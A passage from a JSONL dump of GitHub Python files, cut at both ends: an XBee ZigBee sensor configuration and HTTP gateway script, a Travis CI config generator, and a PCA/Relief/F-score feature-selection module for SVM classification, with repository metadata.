{}\".format(x))\ny = []\nfor value in x:\n y.append(p(value))\nprint(\"y_values: {}\".format(y))\n","repo_name":"pandeydevendra/python_dev","sub_path":"ds_ml/plot/linear_algebra/cubic_parabola.py","file_name":"cubic_parabola.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36151353154","text":"#!/usr/bin/python3\nimport configparser\nimport binascii\nimport serial\nimport operator\nimport logging\nimport argparse\nimport threading\nimport time\nimport json\nfrom xbee.zigbee import ZigBee\nfrom xbee.helpers.dispatch import Dispatch\nimport cherrypy\n\n\n# TODO: Make sure that the lastvalues dictionary is synchronized\n# maps node name to its last received value\nlastvalues = {}\n# A queue used to send xbee messages\nxbeeque = None\n# Maps a node name to the serial number\nnametoserial = None\n\ndef h2b(hexcode):\n return bytes.fromhex(hexcode)\n\ndef b2h(bytecode):\n return binascii.hexlify(bytecode).decode(encoding='ascii')\n\ndef pintocommand(pname):\n return pname.upper().encode(encoding='ascii', errors='strict')\n\n# Configuration values for the pins\npintovalue = {\n 'off' : h2b('00'),\n 'default' : h2b('01'),\n 'analog' : h2b('02'),\n 'digital' : h2b('03'),\n 'output_lo' : h2b('04'),\n 'output_hi' : h2b('05') }\n\npinlist = ['d0','d1','d2','d3','d4','d6','d7','p0','p1','p2']\n\n# Main methods\ndef config_client(xbee,dispatch,masterconfig,nodeconfig):\n \"\"\"\n Configures the sensor node\n \n Parameters\n ----------\n xbee : xbee object\n dispatch : xbbe dispatch\n masterconfig : dict\n Master configuration file\n nodeconfig : dict\n Node configuration file\n \"\"\"\n\n resp = threading.Event()\n \n serialnumber = ''\n def response_handler(name,packet):\n nonlocal serialnumber\n if packet['frame_id'] == h2b('01'):\n assert len(serialnumber) == 0\n serialnumber += b2h(packet['parameter'])\n if packet['frame_id'] == h2b('02'):\n serialnumber += b2h(packet['parameter']) \n resp.set()\n \n logging.debug(' Received packet : \"%s\"', str(packet).replace('\\n',' '))\n \n dispatch.register(\n \"at_response_handler\", \n response_handler,\n lambda packet: (packet['id'] == 'at_response')\n )\n\n # Read the id of the xbee and determine whether it already is in the configuration file\n resp.clear()\n xbee.at(frame_id=h2b('01'),command=b'SH')\n xbee.at(frame_id=h2b('02'),command=b'SL')\n if not resp.wait(1):\n logging.critical('No response from the xbee, make sure that it is in API mode.')\n raise ValueError('No xbee response.') \n \n logging.info('Connected xbee with serial number \"%s\".', serialnumber)\n # Determine allowed node types\n logging.debug('Parsing node types from the main file')\n try:\n nodetypes = [nt for nt in masterconfig.keys() if nt != 'DEFAULT'] + ['MASTER']\n logging.debug('Loaded node types %s', nodetypes)\n networkid = masterconfig['DEFAULT']['networkid'] # assuming this was checked for existence and validity before\n except:\n logging.critical('Could not parse the main configuration file (default: xbeesens.cfg).')\n raise\n \n logging.debug('Parsing node configuration file.')\n try:\n if len(nodeconfig['DEFAULT']) > 0:\n logging.warning('Node configuration file must not contain any DEFAULT entries or a sensor named \"DEFAULT\". DEFAULT sensor will be ignored.')\n \n nodes = [(name,node) for name,node in nodeconfig.items() if name != 'DEFAULT' and node['serial'] == serialnumber]\n if len(nodes) > 1:\n logging.critical('Nodes with duplicate serial numbers in the configuration file.')\n raise ValueError('Nodes with duplicate serial numbers in the configuration file.')\n elif len(nodes) == 1:\n nodename = nodes[0][0]\n nodetype = nodes[0][1]['type']\n \n if nodetype not in nodetypes:\n logging.critical('Invalid type \"%s\" for node \"%s\" with serial number \"%s\". Allowed types are: %s.',nodetype,nodename,serialnumber,nodetypes)\n raise ValueError('Invalid node type.')\n else:\n logging.error('No node with serial number \"{1}\" defined in \"{0}\" (or the file does not exist). Please add the following configuration entry to the file e.g.:\\n[CustomNodeName]\\nserial = {1}\\ntype = \\n# Allowed types: {2}'.format(config['DEFAULT']['nodefile'], serialnumber, nodetypes))\n return\n \n except Exception as e:\n logging.critical('Could not parse the node configuration file \"%s\".', config['DEFAULT']['nodefile'])\n raise e\n \n if nodetype == 'MASTER':\n logging.info('Configuring a master node.')\n \n # Set network id\n logging.debug('Setting network id.')\n xbee.at(frame_id=h2b('0A'),command=b'ID',parameter=h2b(networkid))\n \n # Auto connect to the network\n logging.debug('Setting network autoconnect.')\n xbee.at(frame_id=h2b('06'),command=b'VJ',parameter=h2b('01'))\n \n \n else: # Dealing with a SENSOR node\n logging.info('Configuring a sensor node.')\n # ---- PARSE pin information\n logging.debug('Parsing pin configuration.')\n nodetypeinfo = masterconfig[nodetype]\n try:\n pinsparsed = ((pinname.replace('pin_',''),value) for pinname,value in nodetypeinfo.items() if pinname.startswith('pin_') )\n \n pinconfig = []\n for pname,ptype in pinsparsed:\n if pname not in pinlist:\n logging.warning('Unknown pin identifier \"%s\". Ignoring.',pname)\n continue\n if ptype not in pintovalue:\n logging.error('Unknown type \"%s\" for pin \"%s\". Ignoring.', ptype, pname)\n continue\n pinconfig.append( (pname,pintovalue[ptype]) )\n \n logging.debug('Pin configuration: \"%s\".', pinconfig) \n except:\n logging.critical('Invalid pin configuration for node type \"%s\".', nodeconfig)\n raise\n \n # --- START configuration\n logging.info('Configuring attached sensor \"%s\" to type \"%s\".', nodename, nodetype)\n \n # Set the parent to be the mesh master node\n logging.debug('Setting target node.')\n xbee.at(frame_id=h2b('08'),command=b'DL',parameter=h2b('00'))\n xbee.at(frame_id=h2b('09'),command=b'DH',parameter=h2b('00'))\n \n # Set network id\n logging.debug('Setting network id.')\n xbee.at(frame_id=h2b('0A'),command=b'ID',parameter=h2b(networkid))\n \n # Set pin information\n logging.debug('Writing pin information')\n for pname,ptype in pinconfig:\n command = pintocommand(pname)\n logging.debug('Sending AT command \"%s\" parameter \"%s\"',command,ptype)\n xbee.at(frame_id=h2b('04'),command=command,parameter=ptype)\n \n # Set sampling interval. It is 1 second initially to prevent long sleep - changed when bound\n logging.debug('Setting node sampling interval.')\n xbee.at(frame_id=h2b('05'),command=b'IR',parameter=h2b('03e8')) \n \n # Auto connect to the network\n logging.debug('Setting network autoconnect.')\n xbee.at(frame_id=h2b('06'),command=b'VJ',parameter=h2b('01'))\n \n # Write configuration\n logging.debug('Writing node configuration.')\n xbee.at(frame_id=h2b('07'),command=b'WR',parameter=h2b('00'))\n \n print('Configured node {0} to type {1}.'.format(nodename,nodetype))\n\nclass XBeeMessage:\n \"\"\"\n Message to be stored in the message queue to be sent to an xbee client\n \"\"\"\n def __init__(self,type,longaddress,command,parameter):\n self.type = type\n self.longaddress = longaddress\n self.parameter = parameter\n self.command = command\n\nclass MainHandler(object):\n\n @cherrypy.expose\n @cherrypy.tools.json_out()\n def get(self,node='all'):\n global lastvalues\n \n if node == 'all':\n return(lastvalues)\n elif node in lastvalues:\n return(lastvalues[node])\n else:\n return({'error':'Invalid node name.'})\n \n @cherrypy.expose\n @cherrypy.tools.json_out() \n def set(set,node='None',pin='None',value='Node'):\n global lastvalues\n global xbeeque\n global nametoserial\n\n if node not in lastvalues:\n return {'error':'Invalid node name.'}\n if pin not in pinlist + ['d5']:\n return {'error':'Invalid pin name.'}\n if value not in ['0','1']:\n return {'error':'Invalid value'}\n \n valraw = h2b('04') if value == '0' else h2b('05')\n xbeeque.put(XBeeMessage('remote_at',h2b(nametoserial[node]),pintocommand(pin),valraw))\n return {'node':nametoserial[node], 'pin':pin,'value':value}\n\ndef listen(xbee,dispatch,masterconfig,nodeconfig):\n \"\"\"\n Launches a service that communicates with the xbee sensors and a webserver interface\n \"\"\"\n logging.info('Starting the listening sequence.')\n \n import queue\n global xbeeque\n xbeeque = queue.Queue()\n \n # TODO: make sure that the right master node is consistent with the configuration file\n \n # Parse the node types\n logging.debug('Parsing node types from the main file.')\n try:\n nodetypes = [nt for nt in masterconfig.keys() if nt != 'DEFAULT']\n # maps node type to interval in string hex form\n typetointerval = {}\n for nt in nodetypes:\n ni = masterconfig[nt]['sampleperiod']\n nih = hex(int(ni))[2:]\n if len(nih) > 4:\n logging.error('Invalid sampling period \"%s\" and its hex representation \"%s\" -- at most 4 hex digits.',ni,nih)\n if len(nih) < 4:\n nih = ('000' + nih)[-4:] \n typetointerval[nt] = nih\n \n logging.debug('Loaded node types %s.', nodetypes)\n logging.debug('Loaded node intervals %s.', typetointerval)\n except:\n logging.critical('Could not parse the main configuration file (default: xbeesens.cfg).')\n raise\n \n # Load node configuration\n logging.debug('Parsing node configuration file.')\n try:\n if len(nodeconfig['DEFAULT']) > 0:\n logging.warning('Node configuration file must not contain any DEFAULT entries or a sensor named \"DEFAULT\". DEFAULT sensor will be ignored.')\n \n nodelist = [(name,node) for name,node in nodeconfig.items() if name != 'DEFAULT'] \n \n for name,node in nodelist:\n if node['type'] not in nodetypes and node['type'] != 'MASTER':\n logging.critical('Unknown node type: \"%s\". Terminating.', node['type'])\n raise ValueError('Unknown node type: \"%s\". Terminating.' % node['type'])\n \n serialtoname = {node['serial'] : name for name,node in nodelist}\n global nametoserial\n nametoserial = {name : node['serial'] for name,node in nodelist}\n nametotype = {name : node['type'] for name,node in nodelist}\n \n except Exception as e:\n logging.critical('Could not parse the node configuration file \"%s\".', config['DEFAULT']['nodefile'])\n raise e\n \n # Load pin and formula configuration for each nodes\n try:\n # pins marked for association (if none, then there is no entry)\n nametopins = {}\n # formulas for the node\n nametoformulas = {}\n for name,nodepars in nodelist:\n if nodepars['type'] == 'MASTER':\n continue\n \n pinsparsed = list((pinname.replace('pin_',''),value) \\\n for pinname,value in masterconfig[nametotype[name]].items() if pinname.startswith('pin_') )\n \n formulasparsed = list((forname.replace('formula_',''),value) \\\n for forname,value in masterconfig[nametotype[name]].items() if forname.startswith('formula_') )\n \n logging.debug('Parsed pin values: %s', pinsparsed)\n if len(pinsparsed) == 0:\n logging.error('No pins configured for node \"%s\".', name)\n \n pinconfig = []\n for pname,ptype in pinsparsed:\n if pname not in pinlist:\n logging.warning('Unknown pin identifier \"%s\". Ignoring.',pname)\n continue\n if ptype not in pintovalue:\n logging.error('Unknown type \"%s\" for pin \"%s\". Ignoring.', ptype, pname)\n continue\n pinconfig.append( (pname,pintovalue[ptype]) )\n \n logging.debug('Node %s pin configuration: \"%s\".', name,pinconfig) \n \n nametopins[name] = pinconfig\n nametoformulas[name] = formulasparsed\n \n except:\n logging.critical('Invalid pin configuration for node type \"%s\".', nodeconfig)\n raise\n \n # Maps serial number addresses to short ones\n logging.debug('Initializing address map.')\n #TODO : make sure that all the code is thread safe (add semaphors)\n shortaddressmap = {}\n \n def onprocesspacket(longaddress, shortaddress,packet,nodename=None):\n \"\"\"\n Processes general packet handling\n \n Returns\n -------\n out : bool\n True if successfull, False if the packet should be skipped\n \"\"\"\n if nodename is None:\n hexlongaddress = b2h(longaddress)\n if hexlongaddress not in serialtoname:\n logging.warning('Unknown node with serial number \"%s\" connected. Ignoring.', hexlongaddress)\n return False\n nodename = serialtoname[hexlongaddress]\n \n # First make sure that the short address is correct and registered\n if longaddress not in shortaddressmap:\n logging.info('Registered (%s,%s)' % (b2h(longaddress), b2h(shortaddress)))\n shortaddressmap[longaddress] = shortaddress\n elif shortaddressmap[longaddress] != shortaddress:\n logging.info('Re-registered (%s,%s)' % (b2h(longaddress), b2h(shortaddress)))\n shortaddressmap[longaddress] = shortaddress\n else:\n logging.debug('Correct short address in the dictionary (%s,%s)' % (b2h(longaddress), b2h(shortaddress)) )\n \n # reads the packet to determine whether the node is OK or needs to be updated\n # if yes then it turns off the association light and sets the correct sampling interval\n if 'samples' in packet and len(packet['samples']) > 0:\n \n # Proceed only when this is a packet with samples\n samples = packet['samples'][0]\n \n if ('dio-5' not in samples) or (samples['dio-5'] is True):\n # if the sample is not present\n logging.info('Initilizing node \"%s\" (updating pin information).', nodename) \n # Turn off the indicator light\n xbeeque.put(XBeeMessage('remote_at',longaddress,b'D5',h2b('04')),True,1)\n # Set the correct sampling time interval\n interval = h2b(typetointerval[nametotype[nodename]])\n logging.debug('Setting sampling interval to %s', interval)\n xbeeque.put(XBeeMessage('remote_at',longaddress,b'IR',interval),True,1)\n\n # Set pin information\n logging.debug('Writing pin information')\n \n for pname,ptype in nametopins[nodename]:\n command = pname.upper().encode(encoding='ascii', errors='strict')\n logging.debug('Sending AT command \"%s\" parameter \"%s\"',command,ptype)\n xbeeque.put(XBeeMessage('remote_at',longaddress,command,ptype))\n \n else:\n logging.warning('Received a sample packet with no samples: \"%s\"', str(packet))\n\n #logging.info('Initializing node \"%s\", short \"%s\"' % (b2h(longaddress),b2h(dest_addr)))\n #xbee.remote_at(dest_addr_long=longaddress,dest_addr=dest_addr,frame_id=h2b('ab'),command=b'D5',parameter=h2b('04'))\n #xbee.remote_at(dest_addr_long=longaddress,dest_addr=dest_addr,frame_id=h2b('ac'),command=b'IR',parameter=h2b('ea60'))\n \n return True\n\n # Create handlers for various packet types\n def status_handler(type, packet):\n logging.info('Status or remote_at_response update received: %s from %s' % (b2h(packet['status']),b2h(packet['source_addr_long'])))\n logging.debug(\"Status update received:\", packet)\n\n dispatch.register(\n \"status\", \n status_handler, \n lambda packet: packet['id']=='status' or packet['id']=='remote_at_response'\n )\n \n dispatch.register(\n \"other\", \n lambda name,packet : logging.debug('Other package received:', packet),\n lambda packet: packet['id']!='status' and packet['id']!='remote_at_response' and packet['id']!='rx_io_data_long_addr'\n )\n \n # TODO: Make sure that the lastvalues dictionary is synchronized\n # maps node name to its last received value\n global lastvalues\n lastvalues = {name : None for name,nt in nodelist if nt['type'] != 'MASTER'}\n \n def io_sample_handler(type, packet):\n \"\"\"\n Handles a sample from a node.\n \n Parameters\n ----------\n type : string\n Type of the packet\n packet : object\n An xbee packet\n \"\"\"\n logging.debug('Starting sample hadler.')\n longaddress = packet['source_addr_long'] \n shortaddress = packet['source_addr']\n \n # convert the address to a hexadecimal\n hexlongaddress = b2h(longaddress)\n if hexlongaddress not in serialtoname:\n logging.warning('Unknown node with serial number \"%s\" connected. Ignoring.', longaddress)\n return\n # name of the node\n nodename = serialtoname[hexlongaddress]\n \n if not onprocesspacket(longaddress,shortaddress,packet,nodename=nodename):\n return\n\n samples = packet['samples']\n if len(samples) != 1:\n logging.error('Something is wrong with the packet. There must be exactly one entry for \"samples\". Packet: \"%s\". Ignoring.', str(packet).replace('\\n',' '))\n samples = samples[0]\n \n samples['timestamp'] = time.time()\n lastvalues[nodename] = samples\n logging.debug('Received a new sample for node \"%s\" with \"%s\".', nodename, samples)\n \n # Compute formulas\n formulas = nametoformulas[nodename]\n if len(formulas) > 0:\n samples_replaced = {n.replace('-','_'):v for n,v in samples.items()}\n for formname,formvalue in formulas:\n try:\n exec('y=' + formvalue,samples_replaced)\n if 'y' in samples_replaced:\n samples[formname] = samples_replaced['y']\n else:\n samples[formname] = '#N/A'\n logging.warning('Formula \"%s\" with value \"%s\" with packet \"%s\" did not set value to variable y.', formname, formvalue, str(packet))\n except Exception as e:\n logging.error('Error computing formula \"%s\" with value \"%s\" with packet \"%s\": %s', formname, formvalue, str(packet), str(e))\n samples[formname] = '#ERR'\n\n logging.debug('Updating a new sample for node \"%s\" with \"%s\" after processing formulas.', nodename, samples) \n \n \n dispatch.register(\n \"io_data\", \n io_sample_handler,\n lambda packet: packet['id']=='rx_io_data_long_addr'\n )\n\n # run the message dispatch in a separate thread\n def message_dispatch():\n # Dispatch messages from the xbee queue\n logging.info('Staring message loop.')\n global xbeeque\n while True:\n try:\n message = xbeeque.get()\n if message.type == 'remote_at':\n if message.longaddress in shortaddressmap:\n shortaddress = shortaddressmap[message.longaddress]\n logging.debug('Sending remote_at message \"%s\" with params \"%s\"', message.command, message.parameter)\n xbee.remote_at(dest_addr_long=message.longaddress,dest_addr=shortaddress,\\\n frame_id=h2b('ab'),command=message.command,parameter=message.parameter)\n else:\n logging.warning('Short address not found - using long address; could be inefficient. Sending remote_at message \"%s\" with params \"%s\"', message.command, message.parameter)\n xbee.remote_at(dest_addr_long=message.longaddress,\\\n frame_id=h2b('ab'),command=message.command,parameter=message.parameter)\n else:\n logging.error('Message type not understood: \"%s\".', message.type)\n except KeyboardInterrupt:\n logging.warning('Caught keyboard interrupt. Exiting.')\n break\n thread = threading.Thread(target = message_dispatch)\n thread.start()\n\n\n # Starting web server\n if 'port' in masterconfig['DEFAULT']:\n portnumber = int(masterconfig['DEFAULT']['port'])\n else:\n logging.warning('No port number specified in the config file (DEFAULT/port), using 8888.')\n portnumber = 8888\n \n logging.info('Starting web server on port %s.' % portnumber)\n cherrypy.config.update({'server.socket_port': portnumber}) \n cherrypy.quickstart(MainHandler())\n\nif __name__ == '__main__':\n \n # make an exception when running interactively in iep\n # must manually create the args object\n if '__iep__' not in dir():\n parser = argparse.ArgumentParser(description='Configure xbee nodes and create an http gateway')\n parser.add_argument('command', choices=['configure','listen'],\n help='Command to run. \"client\"/\"server\" will configure the connected xbee, \"listen\" will launch a deamon that monitors and saves the received massages.') \n \n parser.add_argument('--config',default='xbeesens.cfg', help='Configuration file.')\n parser.add_argument('--port',default='/dev/ttyUSB0', help='Port to which to communicate')\n parser.add_argument('--rate',default=9600,help='Communication rate', type=int)\n parser.add_argument('-v','--verbose',action='count',help='Increase logging verbosity, use -vvv for maximal verbosity.')\n\n args = parser.parse_args()\n else:\n if 'args' not in dir():\n class X:\n pass\n \n args = X()\n args.config = 'xbeesens.cfg'\n args.verbose = 3 \n args.port = '/dev/ttyUSB0'\n args.rate = 9600\n args.command = 'listen'\n \n # Determine the right verbosity\n if args.verbose == 0 or args.verbose == None:\n level = logging.ERROR\n elif args.verbose == 1:\n level = logging.WARNING\n elif args.verbose == 2:\n level = logging.INFO\n elif args.verbose == 3:\n level = logging.DEBUG\n else:\n raise ValueError('Invalid log level: %s' % args.verbose)\n \n logging.basicConfig(format='%(asctime)s: %(levelname)s: %(message)s',level=level)\n \n logging.info('Reading main configuration file \"%s\".',args.config)\n config = configparser.ConfigParser()\n config.read(args.config)\n \n if 'networkid' not in config['DEFAULT']:\n raise ValueError('Missing \"networkid\" in DEFAULT group of the configuration file.')\n \n try:\n hexnet = h2b(config['DEFAULT']['networkid'])\n logging.debug('Byte representation of network id \"%s\".', hexnet)\n if len(hexnet) != 2:\n raise ValueError('network id is not 2 bytes')\n except:\n logging.critical('Failed parsing networkid. It is \"%s\", but must be a 4-digit hexadecimal.', config['DEFAULT']['networkid'])\n raise\n \n if 'nodefile' not in config['DEFAULT']:\n raise ValueError('Missing \"nodefile\" in DEFAULT group of the configuration file.')\n nodefilename = config['DEFAULT']['nodefile'] \n \n logging.info('Reading nodes configuration \"%s\"', nodefilename)\n nodeconfig = configparser.ConfigParser()\n try:\n nodeconfig.read(nodefilename)\n except:\n logging.critical('Could not read the node configuration file \"%s\".', nodefilename)\n raise\n \n # Open serial port\n with serial.Serial(args.port,args.rate) as ser:\n # Create an xbee ZigBee communication object\n dispatch = Dispatch(ser)\n logging.debug('Creating xbee object.')\n xbee = ZigBee(ser,callback=dispatch.dispatch)\n\n try:\n if args.command == 'listen':\n listen(xbee,dispatch,config,nodeconfig)\n elif args.command == 'configure':\n config_client(xbee,dispatch,config,nodeconfig)\n else:\n logging.critical('Unknown command \"%s\", terminating.',args.command)\n finally:\n # halt() must be called before closing the serial port in order to ensure proper thread shutdown\n logging.info('Halting xbee.')\n xbee.halt()\n ser.close()\n logging.info('Closed serial port.')\n\n #with open('example.cfg', 'w') as configfile:\n # config.write(configfile)\n","repo_name":"marekpetrik/xbeesens","sub_path":"xbeesens.py","file_name":"xbeesens.py","file_ext":"py","file_size_in_byte":25254,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"34067482786","text":"from tox._config import parseconfig\n\nTOX_ENVS = list()\nfor env in parseconfig(None, 'tox').envlist:\n TOX_ENVS.append(\" - TOX_ENV={0}\".format(env))\n\nTEMPLATE = '''\nlanguage: python\npython: 2.7\nenv:\n{0}\ninstall:\n - pip install tox\nscript:\n - tox -e $TOX_ENV\n'''\n\nprint(TEMPLATE.format('\\n'.join(TOX_ENVS)))\n","repo_name":"ipfs-shipyard/py-ipfs","sub_path":"travis.py","file_name":"travis.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":476,"dataset":"github-code","pt":"72"} +{"seq_id":"74326607592","text":"# import packages\r\nimport os\r\nimport numpy as np\r\nimport pandas as pd\r\nnow_path = os.getcwd()\r\nfile_path = os.path.dirname(__file__)\r\nimport sys\r\nsys.path.append(file_path)\r\nimport Load as iload\r\nimport Visual as ivis\r\nimport SVM as isvm\r\nimport Evaluate as ieval\r\nimport Plot as iplot\r\nimport math\r\nimport random\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn.preprocessing import MinMaxScaler\r\n\r\n\r\n# PCA #########################################################################\r\n# 特征组合测试\r\ndef select_test(data, label, feature, c_number, gamma, crossv, now_path):\r\n \r\n fs_acc = []\r\n filter_data = []\r\n for k in label:\r\n filter_data.append(str(k))\r\n start_e = 0\r\n for i in range(len(feature)):\r\n start_e += 1\r\n key = feature[i]\r\n for j in range(len(data)):\r\n filter_data[j] += ' ' + str(i + 1) + ':' + str(data[j,key])\r\n out_content = ''\r\n for n in filter_data:\r\n out_content += n + '\\n'\r\n with open('mid-ifs', 'w') as ot:\r\n ot.write(out_content)\r\n test_label, predict_label = isvm.svm_evaluate(os.path.join(now_path, 'mid-ifs'),\r\n float(c_number), float(gamma), int(crossv))\r\n standard_num = ieval.evaluate_score(test_label, predict_label)\r\n single_acc = round(standard_num[4], 3)\r\n fs_acc.append(single_acc)\r\n os.remove('./mid-ifs')\r\n ivis.visual_easy_time(start_e, len(feature))\r\n return fs_acc\r\n\r\n\r\ndef pca_scale(x_train):\r\n min_max_scaler = MinMaxScaler(feature_range=(-1, 1))\r\n scaler = min_max_scaler.fit(x_train)\r\n x_train_ = scaler.transform(x_train)\r\n return x_train_\r\n\r\n\r\n# pca\r\ndef select_pca(data):\r\n x = data.iloc[:, :]\r\n x_s = pca_scale(x)\r\n pca = PCA(n_components=1)\r\n pca.fit(x_s)\r\n pc1_loadings = pca.components_.T * np.sqrt(pca.explained_variance_)\r\n pc1_featurescore = pd.DataFrame({'Feature': x.columns,\r\n 'PC1_loading': pc1_loadings.T[0],\r\n 'PC1_loading_abs': abs(pc1_loadings.T[0])})\r\n pc1_featurescore = pc1_featurescore.sort_values('PC1_loading_abs', ascending=False)\r\n feature_selection = []\r\n for i in pc1_featurescore['Feature']:\r\n feature_selection.append(i)\r\n return feature_selection\r\n\r\n\r\n# save\r\ndef select_save(out, fs_sort):\r\n out_file = 'IFS-feature-sort: '\r\n for j in fs_sort:\r\n out_file += str(j + 1) + ' '\r\n with open(out, 'w', encoding='UTF-8') as f:\r\n f.write(out_file)\r\n f.close()\r\n\r\n\r\n# select pca main for svm\r\ndef select_svm_pca(in_path, c=8, g=0.125, cv=5, out_path=now_path, all_p=True):\r\n if out_path != None:\r\n if os.path.split(out_path)[1] not in os.listdir(os.path.split(out_path)[0]):\r\n os.makedirs(out_path)\r\n # load svm\r\n np_data, np_label = iload.load_svmfile(in_path)\r\n # PCA\r\n pd_data = pd.DataFrame(np_data)\r\n fs_sort = select_pca(pd_data)\r\n # get filter sort result\r\n fs_acc = select_test(np_data, np_label, fs_sort, c, g, cv, now_path)\r\n print('\\n特征筛选完成,导出结果中...')\r\n # plot\r\n if all_p == True:\r\n iplot.plot_select(fs_sort, fs_acc, os.path.join(out_path, 'Fsort-pca.png'), in_path=in_path)\r\n else:\r\n iplot.plot_select(fs_sort, fs_acc, os.path.join(out_path, 'Fsort-pca.png'))\r\n # save results\r\n select_save(os.path.join(out_path, 'Fsort-pca.txt'), fs_sort)\r\n return fs_acc.index(max(fs_acc))\r\n else:\r\n # 读取文件\r\n np_data, np_label = iload.load_svmfile(in_path)\r\n # PCA\r\n pd_data = pd.DataFrame(np_data)\r\n fs_sort= select_pca(pd_data)\r\n # get filter sort result\r\n fs_acc = select_test(np_data, np_label, fs_sort, c, g, cv, now_path)\r\n return fs_sort, fs_acc\r\n\r\n# select pca main for numpy\r\ndef select_np_pca(np_data, np_label, c=8, g=0.125, cv=5, out_path=now_path, in_path=None):\r\n if out_path != None:\r\n if os.path.split(out_path)[1] not in os.listdir(os.path.split(out_path)[0]):\r\n os.makedirs(out_path)\r\n # PCA\r\n pd_data = pd.DataFrame(np_data)\r\n fs_sort= select_pca(pd_data)\r\n # get filter sort result\r\n fs_acc = select_test(np_data, np_label, fs_sort, c, g, cv, now_path)\r\n print('\\n特征筛选完成,导出结果中...')\r\n # plot\r\n if in_path != None:\r\n iplot.plot_select(fs_sort, fs_acc, os.path.join(out_path, 'Fsort-pca.png'), in_path=in_path)\r\n else:\r\n iplot.plot_select(fs_sort, fs_acc, os.path.join(out_path, 'Fsort-pca.png'))\r\n select_save(os.path.join(out_path, 'Fsort-pca.txt'), fs_sort)\r\n return fs_acc.index(max(fs_acc))\r\n else:\r\n # PCA\r\n pd_data = pd.DataFrame(np_data)\r\n fs_sort= select_pca(pd_data)\r\n # get filter sort result\r\n fs_acc = select_test(np_data, np_label, fs_sort, c, g, cv, now_path)\r\n return fs_sort, fs_acc\r\n\r\n\r\n# RF ##########################################################################\r\n\r\n# sort\r\ndef select_sort_rf(data):\r\n arr = []\r\n for i in data:\r\n arr.append(i)\r\n index = []\r\n for i in range(len(arr)):\r\n index.append(i)\r\n for i in range(len(arr) - 1):\r\n min_index = i\r\n for j in range(i + 1, len(arr)):\r\n if arr[j] < arr[min_index]:\r\n min_index = j\r\n index[min_index], index[i] = index[i], index[min_index]\r\n arr[min_index], arr[i] = arr[i], arr[min_index]\r\n # 倒序输出\r\n re_index = []\r\n for i in range(len(index) - 1, -1, -1):\r\n re_index.append(index[i])\r\n return re_index\r\n\r\n\r\n# ojld distance\r\ndef ojld_distance(p_data, n_data, test_data, number):\r\n p_distance = []\r\n n_distance = []\r\n for line in p_data:\r\n p_distance.append(math.pow((test_data[number] - line[number]), 2))\r\n for line in n_data:\r\n n_distance.append(math.pow((test_data[number] - line[number]), 2))\r\n return [min(p_distance), min(n_distance)]\r\n\r\n\r\n# relief method\r\ndef select_relief(number, feature_class, feature_line, cycle):\r\n feature_standard = list(feature_line)\r\n p_data = []\r\n n_data = []\r\n for i in range(len(feature_standard)):\r\n if feature_class[i] == 0:\r\n p_data.append(feature_standard[i])\r\n if feature_class[i] == 1:\r\n n_data.append(feature_standard[i])\r\n weight = 0\r\n m = 0\r\n for m in range(cycle):\r\n rand_num = random.randint(0, len(feature_standard) - 1)\r\n if feature_class[rand_num] == 0:\r\n distance_box = ojld_distance(p_data, n_data, feature_standard[rand_num], number)\r\n weight += -distance_box[0] + distance_box[1]\r\n if feature_class[rand_num] == 1:\r\n distance_box = ojld_distance(p_data, n_data, feature_standard[rand_num], number)\r\n weight += -distance_box[1] + distance_box[0]\r\n aver_weight = weight / (m + 1)\r\n aver_weight = 1 / (1 + math.exp(-aver_weight))\r\n return aver_weight\r\n\r\n\r\n# fscore method\r\ndef select_fscore(number, feature_class, feature_line):\r\n type_both = 0\r\n type_a = 0\r\n type_b = 0\r\n t0 = 0\r\n t1 = 0\r\n for i in range(len(feature_class)):\r\n if feature_class[i] == 0:\r\n type_a += feature_line[i, number]\r\n t0 += 1\r\n else:\r\n type_b += feature_line[i, number]\r\n t1 += 1\r\n type_both += feature_line[i, number]\r\n avg_0 = type_a / t0\r\n avg_1 = type_b / t1\r\n avg_both = type_both / len(feature_class)\r\n f_son = math.pow(avg_0 - avg_both, 2) + math.pow(avg_1 - avg_both, 2)\r\n avg_m_0 = 0\r\n avg_m_1 = 0\r\n for i in range(len(feature_class)):\r\n if feature_class[i] == 0:\r\n avg_m_0 += (math.pow(feature_line[i, number] - avg_0, 2))\r\n else:\r\n avg_m_1 += (math.pow(feature_line[i, number] - avg_1, 2))\r\n f_mother = avg_m_0 / (t0 - 1) + avg_m_1 / (t1 - 1)\r\n if f_mother != 0:\r\n f_score = f_son / f_mother\r\n else:\r\n f_score = -0.1\r\n return f_score\r\n\r\n\r\n# select features\r\ndef select_rf(np_data, np_label, cycle):\r\n relief_list = []\r\n start_num = 0\r\n for each_number in range(len(np_data[0])):\r\n start_num += 1\r\n ivis.visual_easy_time(start_num, len(np_data[0]))\r\n type_relief = select_relief(each_number, np_label, np_data, cycle) # 求得每个特征relief\r\n type_fscore = select_fscore(each_number, np_label, np_data) # 求得每个特征f-score\r\n complex_num = 1 / (math.exp(-type_relief) + 1) + 1 / (math.exp(-type_fscore) + 1)\r\n relief_list.append(complex_num)\r\n relief_pool = select_sort_rf(relief_list) # 排序\r\n return relief_pool, relief_list\r\n\r\n\r\n# select rf main for svm\r\ndef select_svm_rf(in_path, c=8, g=0.125, cv=5, cycle=50, out_path=now_path, all_p=True, raaBook='minCODE'):\r\n if out_path != None:\r\n if os.path.split(out_path)[1] not in os.listdir(os.path.split(out_path)[0]):\r\n os.makedirs(out_path)\r\n # load svm\r\n np_data, np_label = iload.load_svmfile(in_path)\r\n # rf\r\n fs_sort, fs_weight = select_rf(np_data, np_label, cycle)\r\n # get filter sort result\r\n fs_acc = select_test(np_data, np_label, fs_sort, c, g, cv, now_path)\r\n # plot\r\n if all_p == True:\r\n iplot.plot_select(fs_sort, fs_acc, os.path.join(out_path, 'Fsort-rf.png'), in_path=in_path)\r\n # plot 2\r\n iplot.plot_feature_analize(fs_sort, fs_acc, fs_weight, os.path.join(out_path, 'Pie-rf.html'), in_path, raaBook=raaBook)\r\n else:\r\n iplot.plot_select(fs_sort, fs_acc, os.path.join(out_path, 'Fsort-rf.png'))\r\n select_save(os.path.join(out_path, 'Fsort-rf.txt'), fs_sort)\r\n return fs_acc.index(max(fs_acc))\r\n else:\r\n # load svm\r\n np_data, np_label = iload.load_svmfile(in_path)\r\n # rf\r\n fs_sort, 